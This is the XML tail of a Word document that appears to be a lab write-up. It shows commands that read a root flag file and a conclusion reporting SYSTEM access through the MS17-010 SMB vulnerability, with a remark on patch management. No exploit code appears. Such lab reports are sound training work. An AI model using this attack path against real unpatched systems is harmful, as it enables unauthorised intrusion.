          <v:rect id="_x0000_i1027" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E6A0C" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39873D07" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>cd C:\Users\Administrator\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D1A53" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>type root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727A165" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4D3CB73C">
          <v:rect id="_x0000_i1026" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16675EDC" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AED61F" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:t>The execution of these commands resulted in successful remote code execution via the MS17-010 SMB vulnerability, granting SYSTEM-level access to the target system. This demonstrates the severe risk posed by unpatched SMB services and highlights the importance of proper patch management and secure service configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C591F94" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="00065B4B" w:rsidP="003C3E8E">
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2D4E697E">
          <v:rect id="_x0000_i1025" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B63B1" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRPr="003C3E8E" w:rsidRDefault="003C3E8E" w:rsidP="003C3E8E">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3E8E">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Bottom of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34941144" w14:textId="77777777" w:rsidR="003C3E8E" w:rsidRDefault="003C3E8E"/>
    <w:sectPr w:rsidR="003C3E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A2333F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70FE2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0A544BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C158D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0763222">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="12927075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E8E"/>
    <w:rsid w:val="00065B4B"/>
    <w:rsid w:val="0039350A"/>
    <w:rsid w:val="003C3E8E"/>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95C4D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{07030089-5C62-6B43-9C61-685BCCB8B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3E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3E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3E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3E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3E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3E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E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E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E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E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3E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3E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3E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3E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3E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E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E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E8E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003C3E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E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E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E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E8E"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003C3E8E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003C3E8E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003C3E8E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003C3E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3E8E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003C3E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425</Words>
  <Characters>2428</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>20</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Gentiana Hisa</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Gentiana Hisa</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-07T18:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-07T18:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>